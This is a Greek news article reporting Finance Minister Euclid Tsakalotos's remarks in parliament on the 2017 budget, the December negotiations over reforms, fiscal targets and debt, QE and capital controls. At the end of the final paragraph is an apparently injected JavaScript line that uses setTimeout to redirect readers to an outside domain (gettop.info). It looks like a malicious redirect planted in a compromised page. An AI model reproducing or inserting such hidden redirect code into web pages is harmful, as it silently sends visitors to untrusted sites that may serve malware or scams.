Τσακαλώτος: Ο Δεκέμβριος πιο κρίσιμος από το καλοκαίρι του 2015

0
11

 

«Ορόσημο η 5η Δεκεμβρίου, καθώς η ελληνική οικονομία ευελπιστεί πως τα τρία κομμάτια της διαπραγμάτευσης -μεταρρυθμίσιες, δημοσινομικοί στόχοι και χρέος- θα ενωθούν«, είπε ο υπουργός Οικονομικών από το βήμα της Βουλής κατά τη συζήτηση του προϋπολογισμού. όπως ανέφερε ο υπουργός «ο Δεκέμβρης είναι ο πιο κρίσιμος μήνας, από το καλοκαίρι του 2015. Μέσα στον Δεκέμβριο θα κριθούν πολλά και σημαντικά για την πρόοδο της ελληνικής οικονομίας και τη δυνατότητα μας να πετύχει ο οδικός χάρτης που ανακοινώσαμε το καλοκαίρι του 2015».

Επίσης, πρόσθεσε: «Μπορεί να υπάρχει και άλλο Εurogroup, αλλά πολύ σύντομα θα έχουμε εικόνα αν θα μπορούμε να πάμε στο QE (ποσοτική χαλάρωση) και πότε θα περάσουμε στην άρση των capital controls, γιατί σταδιακή χαλάρωση γίνεται».

Όσον αφορά στην τριπλέτα της κρίσιμης διαπραγμάτευσης, ο Ευκλείδης Τσακαλώτος είπε:

Για τις μεταρρυθμίσεεις: Οι συζητήσεις με τους θεσμούς είναι διαδοχικές και υπάρχουν διάφορες προσεγγίσεις κυρίως ως προς το πώς θα καλυφθούν οι στόχοι, εντός του προγράμματος, το 2017 και το 2018.

-Για τους δημοσιονομικούς στόχους:Η συζήτηση αφορά και το τι θα γίνει μετά το 2018, «αν θα είμαστε στο 3,5%, αν θα μειωθεί ο στόχος ή αν θα είναι 3,5% για λίγα χρόνια και μετά θα μειωθεί», όπως χαρακτηριστικά ανέφερε. Ο υπουργός Οικονομικών έσπευσε στο σημείο αυτό να επαναλάβει την παρότρυνση που έχει απευθύνει στο ΔΝΤ. Ότι δηλαδή, αν θέλει μείωση του στόχου του πλεονάσματος λίγο πάνω από το 1,5%, αντί του 3,5%, και εφόσον συμφωνεί με όσα λένε Ντράγκι, Μοσκοβισί, Ομπάμα, Λιου ότι η ελληνική οικονομία δεν πρέπει να πάρει άλλα υφεσιακά μέτρα, τότε αντί να ζητάει νέα μέτρα, να πιέσει, όχι τον αδύναμο, αλλά το ισχυρό παίκτη, αυτόν που δεν θέλει να δώσει πολλά για το χρέος.

-Για το χρέος.Νομίζω μέχρι τον Γενάρη οι λεπτομέρειες θα έχουν δοθεί, θα ξέρουμε τα τρία κομμάτια, θα ξέρουμε να αξιολογήσουμε ποιες οι προοπτικές για την ελληνική οικονομία για την επόμενη περίοδο.

Σχετικά με τον προϋπολογισμό του 2017, είπε ότι ουσιαστικά είναι μια «απεικόνιση της κυβερνητικής πολιτικής από πλευρά των φόρων και των δαπανών. Έχει θετικά μηνύματα και δυσκολίες, όπως όλοι οι προϋπολογισμοί, ιδιαίτερα στην περίοδο της κρίσης». Ο υπουργός Οικονομικών είπε ότι υπάρχουν «άνθρωποι που η κυβέρνηση προσπαθεί να υποστηρίξει και άλλοι που αδικούνται αλλά η στρατηγική της κυβέρνησης εδώ και 1,5 χρόνο είναι να ελαφρύνει τις πιο ευάλωτες τάξεις και συγχρόνως να αντιμετωπιστούν τα θέματα της φοροδιαφυγής και του λαθρεμπορίου«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here